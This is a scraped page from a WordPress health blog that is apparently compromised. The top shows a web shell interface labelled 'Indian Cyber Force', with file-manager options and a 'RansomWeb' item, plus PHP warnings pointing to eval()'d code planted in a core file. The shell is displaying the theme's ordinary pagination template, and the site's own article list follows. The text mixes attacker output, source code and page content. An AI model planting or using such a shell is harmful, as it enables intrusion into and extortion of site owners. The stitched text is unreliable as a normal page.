Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/template-parts/sections/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/template-parts/sections/site-pagination.php
<?php
/**
 * Template part for Site Pagination for Lists Posts
 *
 * @package Graceful
 */

$graceful_site_pages = $wp_query->max_num_pages;
$graceful_site_paged = get_query_var( 'paged' );
$graceful_new_range = 2;
$graceful_show_items = ( $graceful_new_range * 2 ) + 1;
$graceful_site_pagination = graceful_options( 'post_page_site_pagination' );

if ( empty( $graceful_site_paged ) ) {
	$graceful_site_paged = 1;
}

if ( ! $graceful_site_pages ) {
	$graceful_site_pages = 1;
}

if ( $graceful_site_pages == 1 ) {
	return;
}

// Check WooCommerce
if ( class_exists( 'WooCommerce' ) && is_shop() ) {
	$graceful_site_pagination = 'numeric';
}

?>

<nav class="content-pagination clear-fix <?php echo esc_attr( $graceful_site_pagination ); ?>"
	data-max-pages="<?php echo esc_attr( $wp_query->max_num_pages ); ?>"
	data-loading="<?php echo esc_attr( 'Loading...', 'graceful' ); ?>">

	<?php

	// Numaric Pagination
	if ( $graceful_site_pagination === 'numeric' ) {

		// Previous Page
		if ( $graceful_site_paged > 1 ) {
			?>
			<a href="<?php echo esc_url( get_pagenum_link( $graceful_site_paged - 1 ) ) ?>" class="numeric-prev-page">
				<i class="fa fa-long-arrow-left"></i>
			</a>
			<?php
		}

		// Site Pagination
		for ( $i = 1; $i <= $graceful_site_pages; $i++ ) {
			if ( 1 != $graceful_site_pages && ( !( $i >= $graceful_site_paged + $graceful_new_range + 1 || $i <= $graceful_site_paged - $graceful_new_range - 1 ) || $graceful_site_pages <= $graceful_show_items ) ) {
				if ( $graceful_site_paged == $i ) {
				?>
					<span class="numeric-current-page">
						<?php echo (int)( $i ) ?>
					</span>
				<?php
				} else {
				?>
					<a href="<?php echo esc_url( get_pagenum_link( $i ) ) ?>">
						<?php echo (int)( $i ) ?>
					</a>
				<?php
				}
			}
		}

		// Next Page
		if ( $graceful_site_paged < $graceful_site_pages ) {
			?>
			<a href="<?php echo esc_url( get_pagenum_link( $graceful_site_paged + 1 ) ) ?>" class="numeric-next-page">
				<i class="fa fa-long-arrow-right"></i>
			</a>
			<?php
		}

	// Pagination Default
	} elseif ( $graceful_site_pagination === 'default' ) {

		if ( get_next_posts_link() ) {
		?>
			<div class="previous-page">
				<?php next_posts_link( '<i class="fa fa-long-arrow-left"></i>&nbsp;' . esc_html__( 'Older Posts', 'graceful' ) ); ?>
			</div>
		<?php
		}

		if ( get_previous_posts_link() ) {
		?>
			<div class="next-page">
				<?php previous_posts_link( esc_html__( 'Newer Posts', 'graceful' ) . '&nbsp;<i class="fa fa-long-arrow-right"></i>' ); ?>
			</div>
		<?php
		}

	// Load More
	} else {
		next_posts_link( esc_html__( 'Load More', 'graceful' ) );
	}

	?>

</nav>
wellwisehub – Page 2 Skip to content
wellwisehub

Latest Articles

  • Blog

    Essential Fitness Gear for a More Productive Workout

  • Blog

    Understanding Drug Test Kits: The Chemistry of Substance Detection

  • Blog

    “Transform Your Look: 5 Ways to Enhance Your Facial Appearance”

  • Blog

    Innovative Approaches and Medications for Ulcer Treatment

  • Blog

    The Advantages and Comforts of Hospice Care

  • Blog

    5 Indicators That Your Facial Skin Could Benefit from Expert Care

  • Blog

    Is It Safe to Remove Surgical Staples at Home?

  • Blog

    The Role of Support Groups in Addiction Recovery

  • Blog

    The Best Way to Arrange Your Skincare Routine for Maximum Effectiveness

  • Blog

    Key Factors to Consider When Choosing a Reliable Drug Rehab Center

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes